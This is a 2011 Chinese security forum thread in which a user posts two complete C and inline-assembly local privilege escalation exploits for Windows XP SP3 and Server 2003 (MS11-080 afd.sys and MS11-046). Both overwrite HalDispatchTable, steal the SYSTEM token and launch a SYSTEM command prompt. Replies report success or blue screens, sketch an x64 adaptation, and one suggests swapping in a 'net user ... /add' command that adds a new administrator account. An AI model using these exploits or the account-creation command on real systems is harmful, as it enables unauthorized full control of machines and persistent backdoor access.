首页
论坛
专栏
课程

[系统底层] [讨论]MS11-080、MS11-046两个提权代码

2011-12-1 20:09 21543

[系统底层] [讨论]MS11-080、MS11-046两个提权代码

2011-12-1 20:09
21543
拿着大牛写的代码自己弹CMD玩,多多包涵。。
/*
 * MS11-080 Afd.sys Privilege Escalation Exploit
 * 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



void main( )
{
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;

	ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
	status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( status )
		return;

	//取ntoskrnl的信息,只要调用一次就行
	ULONG	NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	//把ntoskrnl.exe加载进来
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	//计算实际地址
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	
	//以下代码就各显神通了
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;

	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(4455);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}

	UCHAR	buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
	memset((PVOID)0x1000,0x45,0x108);
	memcpy((PVOID)0x1000,buf1,25);
	
	if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	//触发,弹出SYSTEM的CMD
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}


/*
 * 触发MS11-046
 * 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



void main( )
{
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;
	
	//取ntoskrnl的信息,只要调用一次就行
	ULONG	status, NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	//把ntoskrnl.exe加载进来
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	//计算实际地址
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

	//以下代码就各显神通了
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;
	
	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(0);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, 0);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}


	DWORD buf[0x30];
	buf[3]=1;
	buf[4]=0x20;

	if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	//触发,弹出SYSTEM的CMD
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}


[推荐]看雪企服平台,提供安全分析、定制项目开发、APP等级保护、渗透测试等安全服务!

上一主题 下一主题
最新回复 (18)
coldairx 2011-12-1 20:27
2
0
加多点注释该多好啊!
狂起来 2011-12-1 21:04
3
0
这两个啥漏洞
zuoyefeng 2011-12-1 21:23
4
0
顶KiDebug
PEBOSS 2011-12-2 03:48
5
0
都是提权啊

什么时候来个溢出的
qhkest 2011-12-2 08:30
6
0
ms11-080在webshell下无法使用。
instruder 4 2011-12-2 08:54
7
0
kidebug 肿么能这么**
lhwqqq 2011-12-2 09:31
8
0
哎  看来我和高手还差的很多很多啊
peaceclub 6 2011-12-3 21:33
9
0
typedef struct _evil32
{
ULONG u1;
ULONG un0;
ULONG u2;
ULONG un1;
WORD  w1;
WORD  w2;
BYTE  z1;
}evil32;

typedef struct _evil64
{
        ULONG u1a;
        ULONG u1b;
        ULONG un0;
        ULONG un1;
        WORD  w1;
        WORD  w2;
        BYTE  z1;
}evil64;

   evil32 e32;
  evil64 e64;
  e32.u1=0x41414141;
  e32.u2=0x42424242;
  e32.un0=0;
  e32.un1=1;
  e32.w1=0xe8;
  e32.w2=0x4444;
  e32.z1=0;

  e64.u1a=0x41414141;
  e64.u1b=tcp_socket;
  e64.un0=0;
  e64.un1=1;
  e64.w1=0xe8;
  e64.w2=0x4444;
  e64.z1=0;

x64貌似不好利用。
longbbyl 2011-12-5 17:09
10
0
提权需要执行
tyTYtyTYTY 2011-12-5 20:37
11
0
支持!!!!!!!!!!!!!!!!!!!!
haw 2011-12-8 09:38
12
0
怎样用啊,我在VC6里编译运行弹出DOD窗口提示error=998,什么情况啊?
雅蠛蝶 2011-12-9 17:55
13
0
ShellExecute( NULL, "open", "cmd.exe", "/c net user xxxx /add && net localgroup administrators xxxx /add", NULL, SW_SHOW);
这样改一下也好~
xss 4 2011-12-11 11:42
14
0
尝试了下,第一个编译成功弹出cmd黑框,任务管理器里面显示systeam用户权限进程
拍拖 1 2011-12-14 15:17
15
0
第一个在我计算机上崩溃蓝屏 XP SP3
wlksl 2011-12-14 16:55
16
0
两个都成功了!!
sillyer 2012-5-23 14:36
17
0
有支持64位的么?
choday 2 2012-5-25 13:08
18
0
sp3 直接蓝屏
dswang 2012-8-30 11:13
19
0
很厉害,能够有分析说明就好了~~~菜鸟飘过
游客
登录 | 注册 方可回帖
返回